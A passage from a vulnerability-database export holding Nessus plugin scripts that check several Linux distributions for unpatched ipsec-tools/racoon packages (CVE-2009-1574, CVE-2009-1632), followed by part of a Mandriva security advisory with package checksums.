a denial of service. (CVE-2009-1632).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-04-02T00:00:00", "id": "UBUNTU_USN-785-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39353", "published": "2009-06-10T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : ipsec-tools vulnerabilities (USN-785-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-785-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39353);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n script_bugtraq_id(34765);\n script_xref(name:\"USN\", value:\"785-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : ipsec-tools vulnerabilities (USN-785-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that ipsec-tools did not properly handle certain\nfragmented packets. A remote attacker could send specially crafted\npackets to the server and cause a denial of service. (CVE-2009-1574)\n\nIt was discovered that ipsec-tools did not properly handle memory\nusage when verifying certificate signatures or processing\nnat-traversal keep-alive messages. A remote attacker could send\nspecially crafted packets to the server and exhaust available memory,\nleading to a denial of service. (CVE-2009-1632).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/785-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools and / or racoon packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:racoon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ipsec-tools\", pkgver:\"0.6.5-4ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"racoon\", pkgver:\"1:0.6.5-4ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ipsec-tools\", pkgver:\"0.6.7-1.1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"racoon\", pkgver:\"1:0.6.7-1.1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ipsec-tools\", pkgver:\"0.7-2.1ubuntu1.8.10.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"racoon\", pkgver:\"1:0.7-2.1ubuntu1.8.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"ipsec-tools\", pkgver:\"0.7-2.1ubuntu1.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"racoon\", pkgver:\"1:0.7-2.1ubuntu1.9.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools / racoon\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T02:37:32", "bulletinFamily": "scanner", "description": "A denial of service flaw was found in the ipsec-tools racoon daemon.\nAn unauthenticated, remote attacker could trigger a NULL pointer\ndereference that could cause the racoon daemon to crash.\n(CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon\ndaemon. If a remote attacker is able to make multiple connection\nattempts to the racoon daemon, it was possible to cause the racoon\ndaemon to consume all available memory. (CVE-2009-1632)\n\nUsers must restart the racoon daemon for this update to take effect.", "modified": "2020-04-02T00:00:00", "id": "SL_20090518_IPSEC_TOOLS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60585", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : ipsec-tools on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60585);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/25 13:36:18\");\n\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n\n script_name(english:\"Scientific Linux Security Update : ipsec-tools on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service flaw was found in the ipsec-tools racoon daemon.\nAn unauthenticated, remote attacker could trigger a NULL pointer\ndereference that could cause the racoon daemon to crash.\n(CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon\ndaemon. If a remote attacker is able to make multiple connection\nattempts to the racoon daemon, it was possible to cause the racoon\ndaemon to consume all available memory. (CVE-2009-1632)\n\nUsers must restart the racoon daemon for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0905&L=scientific-linux-errata&T=0&P=1284\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fef4ff51\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"ipsec-tools-0.6.5-13.el5_3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T02:01:32", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2009:1036 :\n\nAn updated ipsec-tools package that fixes multiple security issues is\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe ipsec-tools package is used in conjunction with the IPsec\nfunctionality in the Linux kernel and includes racoon, an IKEv1 keying\ndaemon.\n\nA denial of service flaw was found in the ipsec-tools racoon daemon.\nAn unauthenticated, remote attacker could trigger a NULL pointer\ndereference that could cause the racoon daemon to crash.\n(CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon\ndaemon. If a remote attacker is able to make multiple connection\nattempts to the racoon daemon, it was possible to cause the racoon\ndaemon to consume all available memory. (CVE-2009-1632)\n\nUsers of ipsec-tools should upgrade to this updated package, which\ncontains backported patches to correct these issues. Users must\nrestart the racoon daemon for this update to take effect.", "modified": "2020-04-02T00:00:00", "id": "ORACLELINUX_ELSA-2009-1036.NASL", "href": "https://www.tenable.com/plugins/nessus/67859", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : ipsec-tools (ELSA-2009-1036)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1036 and \n# Oracle Linux Security Advisory ELSA-2009-1036 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67859);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:08\");\n\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n script_bugtraq_id(34765);\n script_xref(name:\"RHSA\", value:\"2009:1036\");\n\n script_name(english:\"Oracle Linux 5 : ipsec-tools (ELSA-2009-1036)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1036 :\n\nAn updated ipsec-tools package that fixes multiple security issues is\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe ipsec-tools package is used in conjunction with the IPsec\nfunctionality in the Linux kernel and includes racoon, an IKEv1 keying\ndaemon.\n\nA denial of service flaw was found in the ipsec-tools racoon daemon.\nAn unauthenticated, remote attacker could trigger a NULL pointer\ndereference that could cause the racoon daemon to crash.\n(CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon\ndaemon. If a remote attacker is able to make multiple connection\nattempts to the racoon daemon, it was possible to cause the racoon\ndaemon to consume all available memory. (CVE-2009-1632)\n\nUsers of ipsec-tools should upgrade to this updated package, which\ncontains backported patches to correct these issues. Users must\nrestart the racoon daemon for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-May/001007.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"ipsec-tools-0.6.5-13.el5_3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T03:08:04", "bulletinFamily": "scanner", "description": "This update of ipsec-tools fixes a crash of racoon in ISAKMP", "modified": "2020-04-02T00:00:00", "id": "SUSE_IPSEC-TOOLS-6302.NASL", "href": "https://www.tenable.com/plugins/nessus/39514", "published": "2009-06-25T00:00:00", "title": "openSUSE 10 Security Update : ipsec-tools (ipsec-tools-6302)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update ipsec-tools-6302.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39514);\n script_version (\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:36\");\n\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n\n script_name(english:\"openSUSE 10 Security Update : ipsec-tools (ipsec-tools-6302)\");\n script_summary(english:\"Check for the ipsec-tools-6302 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of ipsec-tools fixes a crash of racoon in ISAKMP's\nde-fragmentation code due to a NULL pointer dereference.\n(CVE-2009-1574) Additionally multiple memory leaks were fixed that\nallowed to execute a remote denial of service attack. (CVE-2009-1632)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ipsec-tools-0.6.5-104.5\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:112\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : ipsec-tools\r\n Date : May 13, 2009\r\n Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\r\n attackers to cause a denial of service &#40;crash&#41; via crafted fragmented\r\n packets without a payload, which triggers a NULL pointer dereference\r\n &#40;CVE-2009-1574&#41;.\r\n \r\n Updated packages are available that brings ipsec-tools to version\r\n 0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\r\n bugfixes over the previous 0.7.1 version, and also corrects this\r\n issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\r\n patched to address this issue.\r\n \r\n Additionally the flex package required for building ipsec-tools has\r\n been fixed due to ipsec-tools build problems and is also available\r\n with this update.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.1:\r\n d9878eb00cd2eab1ddab465ae1cc77d4 2008.1/i586/flex-2.5.33-3.1mdv2008.1.i586.rpm\r\n 9f806b3e098e21f478cbe7b342c4788d 2008.1/i586/ipsec-tools-0.7.2-0.1mdv2008.1.i586.rpm\r\n 417be6a91d0f9959adde599b31281e18 2008.1/i586/libipsec0-0.7.2-0.1mdv2008.1.i586.rpm\r\n ddea0f917e8c20428f8f82e6bc5fc84f 2008.1/i586/libipsec-devel-0.7.2-0.1mdv2008.1.i586.rpm \r\n 2df69acaabd5b1bd4ae9559b50a2fe38 2008.1/SRPMS/flex-2.5.33-3.1mdv2008.1.src.rpm\r\n 073dd7f429789e991ce2140ae94dc9e3 2008.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2008.1/X86_64:\r\n 7540e1692e011f5751b70ca5f813d30e 2008.1/x86_64/flex-2.5.33-3.1mdv2008.1.x86_64.rpm\r\n e3b5eaafbfbb853fc8570b57bd24ca8f 2008.1/x86_64/ipsec-tools-0.7.2-0.1mdv2008.1.x86_64.rpm\r\n bed8cf24ce2d9f7e0762330f03fe9f77 2008.1/x86_64/lib64ipsec0-0.7.2-0.1mdv2008.1.x86_64.rpm\r\n 6d9a2a1a75c2541556c8961f50a8db44 2008.1/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2008.1.x86_64.rpm \r\n 2df69acaabd5b1bd4ae9559b50a2fe38 2008.1/SRPMS/flex-2.5.33-3.1mdv2008.1.src.rpm\r\n 073dd7f429789e991ce2140ae94dc9e3 2008.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n ed0510b3f70d276a944a1d08dd2d8cc1 2009.0/i586/flex-2.5.35-2.1mdv2009.0.i586.rpm\r\n 05d955250a465bf3db080b3030601169 2009.0/i586/ipsec-tools-0.7.2-0.1mdv2009.0.i586.rpm\r\n ced5cda86b12e2fab5c1bbcccda4712f 2009.0/i586/libipsec0-0.7.2-0.1mdv2009.0.i586.rpm\r\n 7dc487599f48ba11d5ce532949854afd 2009.0/i586/libipsec-devel-0.7.2-0.1mdv2009.0.i586.rpm \r\n d2f12938586e4487a63cd930b8766f3c 2009.0/SRPMS/flex-2.5.35-2.1mdv2009.0.src.rpm\r\n 151ae87db743b0cae0eaa30edd4bf0db 2009.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 11f863a96976eae23b36b2d84b88bc05 2009.0/x86_64/flex-2.5.35-2.1mdv2009.0.x86_64.rpm\r\n 171ef0199e2cb79c5c8e9577fd4eab0b 2009.0/x86_64/ipsec-tools-0.7.2-0.1mdv2009.0.x86_64.rpm\r\n 9e30ebce0b6cda0ca64282e84e19bab7 2009.0/x86_64/lib64ipsec0-0.7.2-0.1mdv2009.0.x86_64.rpm\r\n d94c59428164d08cc73a65b45a936b89 2009.0/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2009.0.x86_64.rpm \r\n d2f12938586e4487a63cd930b8766f3c 2009.0/SRPMS/flex-2.5.35-2.1mdv2009.0.src.rpm\r\n 151ae87db743b0cae0eaa30edd4bf0db 2009.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n e99fc0e432bcf6d8d6bda9099ebf1fe5 2009.1/i586/flex-2.5.35-3.1mdv2009.1.i586.rpm\r\n 7e91d7a68657858af9c54a12c4fb8464 2009.1/i586/ipsec-tools-0.7.2-0.1mdv2009.1.i586.rpm\r\n 8dd23d6335cf66b6fd3dad3695450495 2009.1/i586/libipsec0-0.7.2-0.1mdv2009.1.i586.rpm\r\n 75ba0568d29e9c5963f6d0a829dd5399 2009.1/i586/libipsec-devel-0.7.2-0.1mdv2009.1.i586.rpm \r\n 1179bd2ca09c92a74c53dd968d42dd41 2009.1/SRPMS/flex-2.5.35-3.1mdv2009.1.src.rpm\r\n 27805cc0683e81278c07ad042cd699f6 2009.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n b6cfd4de694b49af45bb4a393d442132 2009.1/x86_64/flex-2.5.35-3.1mdv2009.1.x86_64.rpm\r\n 34542c4ab11123ca26d66d54f20b7785 2009.1/x86_64/ipsec-tools-0.7.2-0.1mdv2009.1.x86_64.rpm\r\n cfa784d23e7d386683129e12efe500a6 2009.1/x86_64/lib64ipsec0-0.7.2-0.1mdv2009.1.x86_64.rpm\r\n cb931729a533fe7accbc894fe4417ed0 2009.1/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2009.1.x86_64.rpm \r\n 1179bd2ca09c92a74c53dd968d42dd41 2009.1/SRPMS/flex-2.5.35-3.1mdv2009.1.src.rpm\r\n 27805cc0683e81278c07ad042cd699f6 2009.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.1.src.rpm\r\n\r\n Corporate 4.0:\r\n 7b0e5364626bc882bc3cdcd6b9c26f13 corporate/4.0/i586/ipsec-tools-0.6.5-2.3.20060mlcs4.i586.rpm\r\n 809b36a5a2edad597edd1249c0b5950c corporate/4.0/i586/libipsec0-0.6.5-2.3.20060mlcs4.i586.rpm\r\n 88949442ee4678ed0f6327d8427da16c \r\ncorporate/4.0/i586/libipsec0-devel-0.6.5-2.3.20060mlcs4.i586.rpm \r\n 5039010d191736aa3657e5ce74f15b34 corporate/4.0/SRPMS/ipsec-tools-0.6.5-2.3.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 835b82cd18e78f3562ceabcc58050226 \r\ncorporate/4.0/x86_64/ipsec-tools-0.6.5-2.3.20060mlcs4.x86_64.rpm\r\n a71843b2cd9c5d02875f9ba339ef8827 \r\ncorporate/4.0/x86_64/lib64ipsec0-0.6.5-2.3.20060mlcs4.x86_64.rpm\r\n 35fe487a2bd39e5ddbbae5d4ff54a68e \r\ncorporate/4.0/x86_64/lib64ipsec0-devel-0.6.5-2.3.20060mlcs4.x86_64.rpm \r\n 5039010d191736aa3657e5ce74f15b34 corporate/4.0/SRPMS/ipsec-tools-0.6.5-2.3.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 